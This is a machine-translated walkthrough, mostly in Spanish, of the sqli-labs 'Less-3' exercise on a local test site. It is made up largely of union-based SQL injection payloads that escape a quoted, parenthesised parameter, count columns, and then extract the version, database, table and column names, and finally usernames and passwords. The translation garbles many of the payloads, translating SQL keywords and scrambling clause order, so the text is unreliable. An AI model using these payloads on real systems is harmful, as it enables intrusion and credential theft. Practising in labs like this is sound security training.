Menos de 3-GET - Error basado cotizaciones -Single, con acoplamiento de cadena
1.原页面
2.?id=1 
3.?id=1' 
' '1'') LÍMITE 0,1 '-> '1'') LIMIT 0,1 -> '1') LIMIT 0,1 ->
( '1') LIMIT 0,1
SQL:
Seleccionar login_name, contraseña de administrador donde id = ( 'id') límite de 0,1
4. Cierre la comilla simple
http://127.0.0.1/sqli/Less-3/?id=1')-+
El SQL:
el Select login_name, contraseña de ADMIN ID = donde - + ') límite de 0,1; ( '1' .)
5. El campo de consulta
ID 1 =.?') Por 3- + Orden
ID 1 =') Ordenar por 4-.? + 
encontrar el número máximo no está siendo dado, la mesa puede ser de longitud de campo determinada es 3
6. Consulta Echo Point
? Id = 0 'unión) seleccione 1,2,3 + 
puede verse eco como el segundo, tercer campo, por lo que el contenido de nuestra investigación debe ser colocado después del segundo y tercer campo se mostrará; (Nota consulta de unión Identificación de error)
7. La consulta versión base de datos de información
? ID = 0 ') SELECT Unión 1, Versión (), 3- + 
8. La consulta de base de datos y el usuario actual
? Id = 0') Unión seleccionar 1, la base de datos (), el usuario () - +
para dar base de datos llamada seguridad conocida
9. búsqueda de nombre mesa
? Id = 0 ') union select 1, (seleccione GROUP_CONCAT (nombre_tabla) desde donde INFORMATION_SCHEMA.TABLES esquema_tabla =' seguridad '), 3- + 
get base de datos de seguridad de todos los nombres de tabla, que damos a los usuarios
10. Consulta de nombre de la columna
? Id = 0 ') union select 1, (seleccione GROUP_CONCAT (nombre_columna) desde donde INFORMATION_SCHEMA.COLUMNS esquema_tabla =' seguridad 'y nombre_tabla =' usuarios), 3- + 
para dar todos los nombres de las columnas de la tabla usuarios, tomar nombre de usuario, contraseña
11. Se pregunta el nombre de usuario y contraseña
? Id = 0 ') union select 1, GROUP_CONCAT (nombre de usuario, 0x3a, password), 3 de usuarios- +
Nota: 0x3a': 'valor hexadecimal del carácter
